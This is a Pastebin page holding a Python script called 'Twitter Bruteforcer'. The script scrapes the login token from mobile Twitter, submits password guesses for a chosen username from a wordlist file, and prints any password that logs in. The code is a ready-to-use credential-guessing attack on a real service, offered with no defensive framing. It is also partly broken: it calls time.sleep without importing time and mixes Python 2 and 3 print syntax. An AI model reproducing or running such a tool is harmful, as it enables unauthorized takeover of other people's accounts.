API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 17th, 2016
104
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.50 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. # - - - - - - - - - - - - - - - - - - - - -
  4. #
  5. # Twitter Bruteforcer developed in Python
  6. # - - - - -
  7. # Developed by Chris Poole | @codingplanets ~ Fixed by BlackVikingPro
  8. #
  9. # - - - - - - - - - - - - - - - - - - - - -
  10. #
  11. # To see usages redirect toward;
  12. # https://github.com/codingplanets/TwitterBruteforcer
  13. # README.md will contain the usages
  14. #
  15. # - - - - - - - - - - - - - - - - - - - - -
  16. #
  17. # Show some support!
  18. # Follow me via Twitter
  19. # http://twitter.com/codingplanets
  20. # and
  21. # http://twitter.com/BlackVikingPro
  22. # - - - - - - - - - - - - - - - - - - - - -
  23. import requests, sys, os
  24.  
  25. def find_between( s, first, last ):
  26. try:
  27. start = s.index( first ) + len( first )
  28. end = s.index( last, start )
  29. return s[start:end]
  30. except ValueError:
  31. return ""
  32.  
  33. def check_password(username, password):
  34.  
  35. # Standard Configuration
  36. s = requests.Session()
  37.  
  38. headers = {'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'}
  39. login_url = 'https://mobile.twitter.com/login'
  40. r = s.get(login_url, headers=headers)
  41.  
  42. # Figure out Payload
  43. auth_token = find_between(str(r.text), '<input name="authenticity_token" type="hidden" value="', '"/>')
  44. redirect_url = find_between(str(r.text), '<input type="hidden" name="redirect_after_login" value="','">')
  45.  
  46. payload = {'authenticity_token':auth_token, 'remember_me':'1', 'wfa':'1', 'redirect_after_login':redirect_url, 'session[username_or_email]':username, 'session[password]':password}
  47. session_url = 'https://mobile.twitter.com/sessions'
  48. r = s.post(session_url, headers=headers, data=payload)
  49.  
  50. # Password Check
  51. r = s.get('https://mobile.twitter.com/account')
  52.  
  53. if ( username not in r.text ):
  54. return False
  55. else:
  56. return True
  57.  
  58. def check_file(username, filename):
  59.  
  60. # Load Password List
  61. password_list = [line.rstrip('\n') for line in open(filename)]
  62.  
  63. for password in password_list:
  64. print(password)
  65. if ( check_password(username, password) == True ):
  66. print('Username:%s; Password:%s' % (username, password))
  67. time.sleep(5)
  68.  
  69. try:
  70. check_file(sys.argv[1], sys.argv[2])
  71. pass
  72. except IndexError as e:
  73. if sys.argv[0].startswith('./'):
  74. print "Usage: %s <username> passwords.txt" % sys.argv[0]
  75. else:
  76. print "Usage: ./%s <username> passwords.txt" % sys.argv[0]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!